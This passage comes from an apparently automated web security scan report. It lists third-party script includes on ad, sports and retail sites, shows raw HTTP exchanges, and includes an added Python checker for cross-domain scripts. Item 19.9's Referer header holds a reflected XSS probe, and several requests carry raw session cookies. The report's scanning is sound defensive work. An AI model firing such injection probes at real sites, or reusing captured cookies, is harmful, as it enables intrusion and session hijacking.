User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: cafe
Cache-Control: private
Content-Length: 12725
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.8. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315115706&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html&dt=1315097706824&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315097706982&frm=4&adk=1607234649&ga_vid=1374080911.1315097707&ga_sid=1315097707&ga_hid=486991809&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=247&biw=1217&bih=1037&eid=36887102&fu=0&ifi=1&dtd=617&xpc=yKatmybmDr&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:54:29 GMT
Server: cafe
Cache-Control: private
Content-Length: 4157
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

19.9. http://grfx.cstv.com/scripts/oas-omni-controls.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /scripts/oas-omni-controls.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /scripts/oas-omni-controls.js HTTP/1.1
Host: grfx.cstv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.und.com/sportsb3f73%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E312ccc6a7af/m-footbl/9873956

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "3912956150"
Last-Modified: Wed, 26 Jan 2011 17:07:09 GMT
Content-Length: 10053
Server: lighttpd
Date: Sun, 04 Sep 2011 00:56:14 GMT
Connection: close

/*
created by david parnell
copyright College Sports Online, Inc.
no part of this application may be used, duplicated or accessed without permission
*/
var NS4 = (document.layers) ? true : false;
var
...[SNIP]...
</script>');
// now calls http://grfx.cstv.com/scripts/mantaray.js from ncaa/library/scripts/cookieCheck.js for Madison for NCAA
//document.writeln('<script language="javascript" src="http://ocp.ncaa.com/adFunctions.js?site=188"></script>');
//document.writeln('<script language="javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-sports.js"></script>
...[SNIP]...

19.10. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1228

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language='javascript' type='text/javascript' src='http://imp.fetchback.com/serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url='></script>
...[SNIP]...

19.11. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-State-Worker%2F174087795950002&width=292&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.143.43
X-Cnection: close
Date: Sun, 04 Sep 2011 01:03:04 GMT
Content-Length: 8338

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...

19.12. http://www.personalcreations.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=uvn4ybjeh3ciqrzoi2ilygjh; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=uvn4ybjeh3ciqrzoi2ilygjh; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-1,xta-1,trf-2,tpp-3,tbc-1,ntd-1,tvc-2,tmm-1,xtb-1,tnp-1,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:11 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-2,thp-1,txb-1,tks-2,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:11 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=42; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:11 GMT; path=/
Set-Cookie: PCR_BrowserId=d9954876-3a8e-4f70-8099-40c2ea2161b9; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:14 GMT
Content-Length: 166986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.13. http://www.personalcreations.com/CatalogQuickOrder.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /CatalogQuickOrder.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CatalogQuickOrder.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:37 GMT
Connection: close
Content-Length: 103473

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
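
The "Issue detail" text of items 19.3 through 19.14 reports the same condition each time: the response loads script from a host other than the one serving the page, so whoever controls that host (or the unencrypted path to it) can run code in the including page's origin. The Python below is an added example for reproducing that check offline; it is not part of the scanner output and not code from any of the sites listed. The sample inputs SAMPLE_HTML and SAMPLE_JS are constructed to resemble the blogs.sacbee.com (19.3) and grfx.cstv.com (19.9) responses above, and the function names are assumptions of this example.

```python
"""Added example (not part of the report or of any listed site's code):
flag <script src> includes whose host differs from the page's own host.
Sample inputs below are constructed to resemble the responses in this
section; nothing is fetched from the network."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag in the markup."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":          # HTMLParser lower-cases tag names
            return
        for name, value in attrs:    # and attribute names
            if name == "src" and value:
                self.srcs.append(value.strip())


def cross_domain_scripts(page_url, html):
    """Return absolute script URLs whose host differs from page_url's host.

    Relative ("/js/x.js") and protocol-relative ("//cdn/x.js") values are
    resolved against page_url first, so only the former counts as same-host.
    The host comparison is exact; whether a sibling subdomain is "trusted"
    is a policy decision the markup cannot make for you.
    Tags inside HTML comments never reach handle_starttag, so they are not
    reported (the browser does not fetch them either).
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = _ScriptSrcCollector()
    collector.feed(html)
    hits = []
    for src in collector.srcs:
        absolute = urljoin(page_url, src)
        host = (urlsplit(absolute).hostname or "").lower()
        if host and host != page_host and absolute not in hits:
            hits.append(absolute)
    return hits


# A <script> tag emitted from a JavaScript string (document.write/writeln,
# as in item 19.9) is never an HTML tag in the response body, so a JS
# response needs a plain text scan instead.  The regex is deliberately
# blind to JS comments: a commented-out writeln still shows up, and the
# reviewer decides whether that line ever executes.
_SCRIPT_SRC_IN_TEXT = re.compile(
    r"<script[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def scripts_written_from_js(js_body):
    """Return src values of <script ...> tags found inside JavaScript text."""
    return _SCRIPT_SRC_IN_TEXT.findall(js_body)


# Constructed sample modelled on the blogs.sacbee.com response (item 19.3).
SAMPLE_PAGE_URL = "http://blogs.sacbee.com/the_state_worker/"
SAMPLE_HTML = """<html><head>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="/js/local.js"></script>
<script type="text/javascript" src="//init.lingospot.com/ls.js?key=3_Sacbee"></script>
<script type="text/javascript">var inline = 1;</script>
<!-- <script src="http://commented.example/never-fetched.js"></script> -->
</head><body></body></html>"""

# Constructed sample modelled on the grfx.cstv.com JavaScript response (19.9).
SAMPLE_JS = """//document.writeln('<script language="javascript" src="http://ocp.ncaa.com/adFunctions.js?site=188"></script>');
document.writeln('<script src="http://grfx.cstv.com/scripts/mantaray.js"><\\/script>');"""


if __name__ == "__main__":
    for url in cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("cross-domain include:", url)
    for src in scripts_written_from_js(SAMPLE_JS):
        print("script written from JS:", src)
```

Run against a saved response body with the request URL as page_url. Two points worth keeping in mind when triaging the hits: nearly every include listed in this section is fetched over http://, with only the cdn.mercent.com tracker in 19.12 and 19.13 using https, so on the plain-http includes an on-path attacker can substitute the script without touching the third party at all; and a text scan of a JavaScript response, as in 19.9, also reports includes that sit in commented-out lines, which is why that item needs a human look before it is counted as a live include.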

19.14. http://www.personalcreations.com/CustomerService-ContactUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /CustomerService-ContactUs.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CustomerService-ContactUs.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 98295

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
